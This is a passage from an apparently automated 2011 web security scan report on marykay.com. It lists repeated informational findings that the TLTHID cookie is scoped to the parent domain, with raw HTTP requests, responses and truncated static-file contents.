Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 27154
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 01 Sep 2011 11:38:38 GMT
Accept-Ranges: bytes
ETag: "823f5b19b68cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.0...x....\........!-%.
.(..R..(..JH,%...J.X.    6v+*"`..6v`..".` ..S..,..z..w....s..s..93'.L>.F..:..R..".*..?Kb__.9.........b.LI.a.l#}.....%2.7....    ..a..L...3../.....}.. ...gD...F|..R..T.3....}....e.
...[SNIP]...

12.82. http://www.marykay.com/IMAGES/bkgLong.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /IMAGES/bkgLong.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /IMAGES/bkgLong.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1942
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:18:22 GMT
Accept-Ranges: bytes
ETag: "4fd9e5621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

GIF89a.......B<:>87JDC60/HBAD><2,+F@>:43@:9<65XRP8214.-4.,;54710?982,*822C=<WQPGA?@::1+*SMLKEC=66OIHXQO3-,932810XQPYRQ5/.D?>LEDF?>E@><55A;:PIG@98VPNWQOUOMSMKMGEOIGTNLRLJQKIPJHNHFICALFDNGFTNMSLKVPOPJIV
...[SNIP]...

12.83. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Checkout/viewbag/btn_x.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Checkout/viewbag/btn_x.png HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 695
Content-Type: image/png
Last-Modified: Thu, 02 Jun 2011 09:23:29 GMT
Accept-Ranges: bytes
ETag: "77524cbc621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...YIDATx...Kk.Q.....<.......2A.J....Tpa.FS....r......"....,.nJ.L........L.....g:. x.r/w...s.....0.[..;....>l..{.$!.T*.l6.\......
...[SNIP]...

12.84. http://www.marykay.com/Images/Site/FooterBack1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/FooterBack1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/FooterBack1.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1466
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "ebcd3647621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

GIF89a..'...............................................................................................................................................................................................
...[SNIP]...

12.85. http://www.marykay.com/Images/Site/hdottedline.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/hdottedline.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/hdottedline.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 809
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "b3923b47621cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:51 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

12.86. http://www.marykay.com/Images/Site/searchbox.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/searchbox.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/searchbox.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 952
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "17f53d47621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

GIF89a.......xKKlCB|OLqFEb=<Z87f?>sHEwKIoFD|MKzKK\:7|ON^;;oFEfA>^;9wJI\87lEBhC@jCB|OKb?<wKKuJG.ONzMKb=;`;;~ONsFEsHG`=;|MLZ:7|KKsJGd?>mFDmEB\;9.POb;;d?<jC@qHE\:9.PNhC>wJGxMK\;7hA@~OLoFB^:9xKIoEBmCBf?<m
...[SNIP]...

12.87. http://www.marykay.com/Images/Site/vdottedline.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/vdottedline.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/vdottedline.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 809
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "a77e4747621cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:51 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

12.88. http://www.marykay.com/Images/Site/wholeheader.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/wholeheader.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/wholeheader.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 13033
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "be14947621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................u....
...[SNIP]...

12.89. http://www.marykay.com/JS/swfobject.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /JS/swfobject.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JS/swfobject.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 6902
Content-Type: application/x-javascript
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "070ef5621cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/**
* SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http://www.open
...[SNIP]...

12.90. http://www.marykay.com/Menu.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Menu.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Menu.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 4421
Content-Type: text/css
Last-Modified: Thu, 02 Jun 2011 09:18:09 GMT
Accept-Ranges: bytes
ETag: "809efefc521cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

.commentfix{}
/* These styles contain RARELY CHANGED rules used when the Menu control adapter is enabled. */
/* These rules correspond to the "pure CSS menu" technique that have been evolving over t
...[SNIP]...

12.91. http://www.marykay.com/Scripts/HeaderScript.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Scripts/HeaderScript.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Scripts/HeaderScript.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1283
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

...var headID = document.getElementsByTagName("head")[0];
if (typeof jQuery == 'undefined') {
//alert("Jquery not present");
var newScriptJQuery = document.createElement('script');
new
...[SNIP]...

12.92. http://www.marykay.com/Scripts/jquery-1.4.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Scripts/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Scripts/jquery-1.4.2.min.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 38069
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

/*!
* jQuery JavaScript Library v1.3
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2
...[SNIP]...

12.93. http://www.marykay.com/Styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Styles.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 14259
Content-Type: text/css
Last-Modified: Wed, 10 Aug 2011 07:14:08 GMT
Accept-Ranges: bytes
ETag: "0e050182d57cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/*******************************************************************************************************************\
* Global Styles
...[SNIP]...

12.94. http://www.marykay.com/Styles_US.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Styles_US.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Styles_US.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 23822
Content-Type: text/css
Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT
Accept-Ranges: bytes
ETag: "03597fd521cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/*******************************************************************************************************************\
* Global Styles
...[SNIP]...

12.95. http://www.marykay.com/Themes/TabMenu/US/tabs.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Themes/TabMenu/US/tabs.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/TabMenu/US/tabs.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/css
Last-Modified: Wed, 06 Apr 2011 17:12:30 GMT
Accept-Ranges: bytes
ETag: "7970d2cf7df4cb1:d8226"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/


12.96. http://www.marykay.com/Themes/TabMenu/tabs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Themes/TabMenu/tabs.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/TabMenu/tabs.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 14231
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:28 GMT
Accept-Ranges: bytes
ETag: "0a655ce7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
